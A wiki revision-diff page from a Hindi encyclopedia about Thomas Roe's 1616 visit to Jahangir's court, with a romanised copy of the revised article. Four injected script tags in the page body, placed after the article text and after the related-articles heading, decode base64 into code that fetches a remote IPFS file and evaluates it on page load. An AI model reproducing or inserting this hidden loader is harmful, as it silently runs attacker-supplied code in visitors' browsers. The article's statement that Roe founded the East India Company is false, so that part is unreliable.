Difference between revisions of "थॉमस रो"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "गुलाम" to "ग़ुलाम")
m (Adding category Category:विदेशी (को हटा दिया गया हैं।))
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*'''थॉमस रो''' बादशाह [[जहाँगीर]] के शासनकाल में 1616 ई. में [[भारत]] आया था।
+
[[चित्र:Thomas-Roe.jpg|thumb|थॉमस रो]]
 +
'''थॉमस रो''' अथवा 'टॉमस रो' बादशाह [[जहाँगीर]] के शासनकाल में 1616 ई. में [[भारत]] आया था।
 
*[[इंग्लैण्ड]] के राजा से आज्ञा लेकर उसने कुछ लोगों को एकत्र कर [[ईस्ट इण्डिया कम्पनी]] की स्थापना की थी।
 
*[[इंग्लैण्ड]] के राजा से आज्ञा लेकर उसने कुछ लोगों को एकत्र कर [[ईस्ट इण्डिया कम्पनी]] की स्थापना की थी।
 
 
*थॉमस रो ने [[अजमेर]] के क़िले में जहाँगीर से मुलाकात की थी।
 
*थॉमस रो ने [[अजमेर]] के क़िले में जहाँगीर से मुलाकात की थी।
 
 
*उसने बादशाह के सामने खड़े होकर एक याचक के रूप में भारत में व्यापार करने की अनुमति माँगी थी।
 
*उसने बादशाह के सामने खड़े होकर एक याचक के रूप में भारत में व्यापार करने की अनुमति माँगी थी।
 
 
*भारत की ग़ुलामी की शुरुआत उसी दिन से हो गई थी, जिस दिन थॉमस रो भारत में आया।
 
*भारत की ग़ुलामी की शुरुआत उसी दिन से हो गई थी, जिस दिन थॉमस रो भारत में आया।
*थॉमस रो ने सम्राट जहाँगीर की अभिरूचियों तथा धार्मिक मान्यताओं के बारे में विस्तार से लिखा है।
+
*थॉमस रो ने सम्राट जहाँगीर की अभिरुचियों तथा धार्मिक मान्यताओं के बारे में विस्तार से लिखा है।
 
*उसने खुसरो प्रकरण का भी उल्लेख किया है।
 
*उसने खुसरो प्रकरण का भी उल्लेख किया है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 19: Line 17:
 
[[Category:विदेशी यात्री]]
 
[[Category:विदेशी यात्री]]
 
[[Category:चरित कोश]]
 
[[Category:चरित कोश]]
 +
[[Category:विदेशी]]
 
__INDEX__
 
__INDEX__

Latest revision as of 04:59, 7 January 2020

thumb|th aaumas ro th aaumas ro athava 't aaumas ro' badashah jahaangir ke shasanakal mean 1616 ee. mean bharat aya tha.

  • ianglaind ke raja se ajna lekar usane kuchh logoan ko ekatr kar eest indiya kampani ki sthapana ki thi.
  • th aaumas ro ne ajamer ke qile mean jahaangir se mulakat ki thi.
  • usane badashah ke samane kh de hokar ek yachak ke roop mean bharat mean vyapar karane ki anumati maangi thi.
  • bharat ki gulami ki shuruat usi din se ho gee thi, jis din th aaumas ro bharat mean aya.
  • th aaumas ro ne samrat jahaangir ki abhiruchiyoan tatha dharmik manyataoan ke bare mean vistar se likha hai.
  • usane khusaro prakaran ka bhi ullekh kiya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>